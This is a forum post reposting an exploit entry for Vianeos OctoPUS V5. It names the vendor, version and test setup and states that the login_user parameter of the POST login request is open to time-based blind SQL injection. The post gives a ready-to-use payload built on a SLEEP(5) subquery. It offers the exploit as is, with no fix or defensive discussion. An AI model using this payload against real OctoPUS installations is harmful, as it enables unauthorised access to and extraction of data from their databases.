This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,700 With Us For: 236 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: Vianeos OctoPUS 5 - 'login_user' SQLi # Date: 01/07/2021 # Exploit Author: Audencia Business SCHOOL # Vendor Homepage: http://www.vianeos.com/en/home-vianeos/ # Software Link: http://www.vianeos.com/en/octopus/ # Version: > V5 # Tested on: Fedora / Apache2 / MariaDB Octopus V5 SQLi The "login_user =" parameter present in the POST authentication request is vulnerable to an Time Based SQLi as follow : ``` Parameter: login_user (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: signin_user=1&login_user=1' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))xENj) AND 'OoKG'='OoKG&password_user=1 ``` Link to comment Share on other sites More sharing options...
Recommended Posts